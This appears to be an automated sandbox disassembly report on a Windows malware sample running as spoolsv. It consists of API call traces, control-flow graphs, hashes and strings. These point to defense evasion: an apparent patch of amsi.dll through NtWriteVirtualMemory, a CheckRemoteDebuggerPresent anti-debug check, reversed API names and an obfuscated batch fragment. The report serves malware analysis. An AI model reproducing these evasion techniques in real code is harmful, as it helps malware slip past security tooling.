\\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                              • API String ID: 3130226682-181751239
                                                                              • Opcode ID: 9d0ff9e287935026df50b1baaccab876246f67c5ef5452eccbc386658428dfda
                                                                              • Instruction ID: ed874154e05177cc76719ddf94b77cbc025ec52654b9e5f374c5c12855f8da99
                                                                              • Opcode Fuzzy Hash: 9d0ff9e287935026df50b1baaccab876246f67c5ef5452eccbc386658428dfda
                                                                              • Instruction Fuzzy Hash: BD24F775A502688FDB11EB64CC80ADE73F6BF84310F5045E6E50DABA50DE30AE8ADF51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5547 2b25a78-2b25ab9 GetModuleFileNameA RegOpenKeyExA 5548 2b25afb-2b25b3e call 2b258b4 RegQueryValueExA 5547->5548 5549 2b25abb-2b25ad7 RegOpenKeyExA 5547->5549 5556 2b25b62-2b25b7c RegCloseKey 5548->5556 5557 2b25b40-2b25b5c RegQueryValueExA 5548->5557 5549->5548 5550 2b25ad9-2b25af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2b25b84-2b25bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2b25bbb-2b25bbf 5552->5554 5555 2b25c9e-2b25ca5 5552->5555 5559 2b25bc1-2b25bc5 5554->5559 5560 2b25bcb-2b25be1 lstrlenA 5554->5560 5557->5556 5561 2b25b5e 5557->5561 5559->5555 5559->5560 5562 2b25be4-2b25be7 5560->5562 5561->5556 5563 2b25bf3-2b25bfb 5562->5563 5564 2b25be9-2b25bf1 5562->5564 5563->5555 5566 2b25c01-2b25c06 5563->5566 5564->5563 5565 2b25be3 5564->5565 5565->5562 5567 2b25c30-2b25c32 5566->5567 5568 2b25c08-2b25c2e lstrcpynA LoadLibraryExA 5566->5568 5567->5555 5569 2b25c34-2b25c38 5567->5569 5568->5567 5569->5555 5570 2b25c3a-2b25c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5555 5571 2b25c6c-2b25c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5555
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                              • RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                              • RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1759228003-2375825460
                                                                              • Opcode ID: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                              • Instruction ID: 4bd932c78b7b0ae43d0d2699d52b0914be321c09d70b45ade323b729943c388b
                                                                              • Opcode Fuzzy Hash: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                              • Instruction Fuzzy Hash: 84515371A5032C7AFB25DAA88C46FEF77AD9B04744F8001E1B64CE6181E6749A488FA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5647 2b3ebf0-2b3ec0a GetModuleHandleW 5648 2b3ec36-2b3ec3e 5647->5648 5649 2b3ec0c-2b3ec1e GetProcAddress 5647->5649 5649->5648 5650 2b3ec20-2b3ec30 CheckRemoteDebuggerPresent 5649->5650 5650->5648 5651 2b3ec32 5650->5651 5651->5648
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EC00
                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC12
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                              • API String ID: 35162468-539270669
                                                                              • Opcode ID: f57adaac508387e4c3b47b208f797807170b0a656168700205ecb1bb585c4167
                                                                              • Instruction ID: 4db03abc1a1aab88f9d7ec3c0bf49ce256d9993a95c6ffda71476ac4a073c6c7
                                                                              • Opcode Fuzzy Hash: f57adaac508387e4c3b47b208f797807170b0a656168700205ecb1bb585c4167
                                                                              • Instruction Fuzzy Hash: 28F0A77090435CAAD723A7A888897DCFBA99F05328FA403D5E424611D1E7754654C651

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B3DC80), ref: 02B3DBEB
                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC80), ref: 02B3DC1B
                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC30
                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC5C
                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC65
                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E950), ref: 02B24C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                              • String ID:
                                                                              • API String ID: 2659941336-0
                                                                              • Opcode ID: 72b051a609ada8354934f86183e16be23707a5ea60c51b7b301020e0c9a54304
                                                                              • Instruction ID: 148882419bc58431bda2f39c08e530452064ddbd69174c59b6d21cdd74146c7b
                                                                              • Opcode Fuzzy Hash: 72b051a609ada8354934f86183e16be23707a5ea60c51b7b301020e0c9a54304
                                                                              • Instruction Fuzzy Hash: BB21C471650319BAEB11EAE4CC46FDE77BDAB48700F5005A1B704F75C0D6B4AA048B95

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E436
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: CheckConnectionInternet
                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                              • API String ID: 3847983778-3852638603
                                                                              • Opcode ID: 6fd5e4d7c0eac811ed7aafce93d305b96c1f134067ff89d6fc26dfd8e4311ed4
                                                                              • Instruction ID: 83cf2c2b53334b04eff771035e8915f2e879690ae65e40824dc6325d7bec5848
                                                                              • Opcode Fuzzy Hash: 6fd5e4d7c0eac811ed7aafce93d305b96c1f134067ff89d6fc26dfd8e4311ed4
                                                                              • Instruction Fuzzy Hash: E6411235B102289FEB02EBA4C840ADE73FAEF4C320F1144A6E555B7A50DA74ED098F60

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 02B38020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38090,?,?,00000000,?,02B37A06,ntdll,00000000,00000000,02B37A4B,?,?,00000000), ref: 02B3805E
                                                                                • Part of subcall function 02B38020: GetModuleHandleA.KERNELBASE(?), ref: 02B38072
                                                                                • Part of subcall function 02B380C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38150,?,?,00000000,00000000,?,02B38069,00000000,KernelBASE,00000000,00000000,02B38090), ref: 02B38115
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B3811B
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(?,?), ref: 02B3812D
                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D74
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                              • API String ID: 2719805696-3542721025
                                                                              • Opcode ID: 872349fb5d0425ec3b1f6f81fe532ce4d91e767f878e96762a345fbe282078d0
                                                                              • Instruction ID: e2b368505690303919d971d64354030018e8fb0cf9fbdb28c536ba5f4541b37f
                                                                              • Opcode Fuzzy Hash: 872349fb5d0425ec3b1f6f81fe532ce4d91e767f878e96762a345fbe282078d0
                                                                              • Instruction Fuzzy Hash: AF012DB5610208BFEB01EFA8EC41E9EB7FDEB49700F518490B508E7A50DA30A915DF25
                                                                              APIs
                                                                                • Part of subcall function 02B36CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D41,?,?,?,00000000), ref: 02B36D21
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02B36E34,00000000,00000000,02B36DB3,?,00000000,02B36E23), ref: 02B36D9F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFromInstanceProg
                                                                              • String ID:
                                                                              • API String ID: 2151042543-0
                                                                              • Opcode ID: 187e879accfee8ce198bcaab122b57fc5b3fea81fa581e18d6b8bee83bf46062
                                                                              • Instruction ID: d35e07569fc37582830da605400f3aa6163dd10dbd1a3392b974fc45c1240d44
                                                                              • Opcode Fuzzy Hash: 187e879accfee8ce198bcaab122b57fc5b3fea81fa581e18d6b8bee83bf46062
                                                                              • Instruction Fuzzy Hash: 2A014731208304BEE706DF64DC129AF7BEDEB48710B5244B5F800D2650E6308A04C978

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5572 2b21724-2b21736 5573 2b21968-2b2196d 5572->5573 5574 2b2173c-2b2174c 5572->5574 5577 2b21973-2b21984 5573->5577 5578 2b21a80-2b21a83 5573->5578 5575 2b217a4-2b217ad 5574->5575 5576 2b2174e-2b2175b 5574->5576 5575->5576 5583 2b217af-2b217bb 5575->5583 5579 2b21774-2b21780 5576->5579 5580 2b2175d-2b2176a 5576->5580 5581 2b21986-2b219a2 5577->5581 5582 2b21938-2b21945 5577->5582 5584 2b21684-2b216ad VirtualAlloc 5578->5584 5585 2b21a89-2b21a8b 5578->5585 5591 2b21782-2b21790 5579->5591 5592 2b217f0-2b217f9 5579->5592 5588 2b21794-2b217a1 5580->5588 5589 2b2176c-2b21770 5580->5589 5593 2b219b0-2b219bf 5581->5593 5594 2b219a4-2b219ac 5581->5594 5582->5581 5590 2b21947-2b2195b Sleep 5582->5590 5583->5576 5595 2b217bd-2b217c9 5583->5595 5586 2b216df-2b216e5 5584->5586 5587 2b216af-2b216dc call 2b21644 5584->5587 5587->5586 5590->5581 5597 2b2195d-2b21964 Sleep 5590->5597 5602 2b217fb-2b21808 5592->5602 5603 2b2182c-2b21836 5592->5603 5599 2b219c1-2b219d5 5593->5599 5600 2b219d8-2b219e0 5593->5600 5598 2b21a0c-2b21a22 5594->5598 5595->5576 5601 2b217cb-2b217de Sleep 5595->5601 5597->5582 5604 2b21a24-2b21a32 5598->5604 5605 2b21a3b-2b21a47 5598->5605 5599->5598 5610 2b219e2-2b219fa 5600->5610 5611 2b219fc-2b219fe call 2b215cc 5600->5611 5601->5576 5609 2b217e4-2b217eb Sleep 5601->5609 5602->5603 5612 2b2180a-2b2181e Sleep 5602->5612 5606 2b218a8-2b218b4 5603->5606 5607 2b21838-2b21863 5603->5607 5604->5605 5614 2b21a34 5604->5614 5617 2b21a68 5605->5617 5618 2b21a49-2b21a5c 5605->5618 5619 2b218b6-2b218c8 5606->5619 5620 2b218dc-2b218eb call 2b215cc 5606->5620 5615 2b21865-2b21873 5607->5615 5616 2b2187c-2b2188a 5607->5616 5609->5575 5621 2b21a03-2b21a0b 5610->5621 5611->5621 5612->5603 5613 2b21820-2b21827 Sleep 5612->5613 5613->5602 5614->5605 5615->5616 5623 2b21875 5615->5623 5624 2b218f8 5616->5624 5625 2b2188c-2b218a6 call 2b21500 5616->5625 5627 2b21a6d-2b21a7f 5617->5627 5626 2b21a5e-2b21a63 call 2b21500 5618->5626 5618->5627 5628 2b218ca 5619->5628 5629 2b218cc-2b218da 5619->5629 5631 2b218fd-2b21936 5620->5631 5635 2b218ed-2b218f7 5620->5635 5623->5616 5624->5631 5625->5631 5626->5627 5628->5629 5629->5631
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                              • Instruction ID: 7c5f3a25644ed6ebf611e114c42ff20b3baec98efa00132b2af18c46f2bfe774
                                                                              • Opcode Fuzzy Hash: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                              • Instruction Fuzzy Hash: 02B12072A103608BDB15CF2CD880356BBE1EF85394F1886EAE65D8F386D730E559CB90

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02B38715
                                                                                • Part of subcall function 02B380C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38150,?,?,00000000,00000000,?,02B38069,00000000,KernelBASE,00000000,00000000,02B38090), ref: 02B38115
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B3811B
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(?,?), ref: 02B3812D
                                                                                • Part of subcall function 02B37D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D74
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B38774
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                              • String ID: DllGetClassObject$W$amsi
                                                                              • API String ID: 941070894-2671292670
                                                                              • Opcode ID: 2c7a4c3541203209035d4d2c3c0af6205baab7fdc56797a67bad833316098968
                                                                              • Instruction ID: d917d9676ca3ec4ead7b116ab855c777b8d0586892128fcc8eb3d80e70e841a9
                                                                              • Opcode Fuzzy Hash: 2c7a4c3541203209035d4d2c3c0af6205baab7fdc56797a67bad833316098968
                                                                              • Instruction Fuzzy Hash: 42F068A054C381B9E202E6749C45F4FBFCE4B52224F448B9DF1E85A2D2D675E1049777

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5652 2b21a8c-2b21a9b 5653 2b21aa1-2b21aa5 5652->5653 5654 2b21b6c-2b21b6f 5652->5654 5657 2b21aa7-2b21aae 5653->5657 5658 2b21b08-2b21b11 5653->5658 5655 2b21b75-2b21b7f 5654->5655 5656 2b21c5c-2b21c60 5654->5656 5659 2b21b81-2b21b8d 5655->5659 5660 2b21b3c-2b21b49 5655->5660 5663 2b21c66-2b21c6b 5656->5663 5664 2b216e8-2b2170b call 2b21644 VirtualFree 5656->5664 5661 2b21ab0-2b21abb 5657->5661 5662 2b21adc-2b21ade 5657->5662 5658->5657 5665 2b21b13-2b21b27 Sleep 5658->5665 5666 2b21bc4-2b21bd2 5659->5666 5667 2b21b8f-2b21b92 5659->5667 5660->5659 5673 2b21b4b-2b21b5f Sleep 5660->5673 5668 2b21ac4-2b21ad9 5661->5668 5669 2b21abd-2b21ac2 5661->5669 5670 2b21af3 5662->5670 5671 2b21ae0-2b21af1 5662->5671 5680 2b21716 5664->5680 5681 2b2170d-2b21714 5664->5681 5665->5657 5672 2b21b2d-2b21b38 Sleep 5665->5672 5675 2b21b96-2b21b9a 5666->5675 5677 2b21bd4-2b21bd9 call 2b214c0 5666->5677 5667->5675 5676 2b21af6-2b21b03 5670->5676 5671->5670 5671->5676 5672->5658 5673->5659 5678 2b21b61-2b21b68 Sleep 5673->5678 5682 2b21bdc-2b21be9 5675->5682 5683 2b21b9c-2b21ba2 5675->5683 5676->5655 5677->5675 5678->5660 5685 2b21719-2b21723 5680->5685 5681->5685 5682->5683 5689 2b21beb-2b21bf2 call 2b214c0 5682->5689 5686 2b21bf4-2b21bfe 5683->5686 5687 2b21ba4-2b21bc2 call 2b21500 5683->5687 5690 2b21c00-2b21c28 VirtualFree 5686->5690 5691 2b21c2c-2b21c59 call 2b21560 5686->5691 5689->5683
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
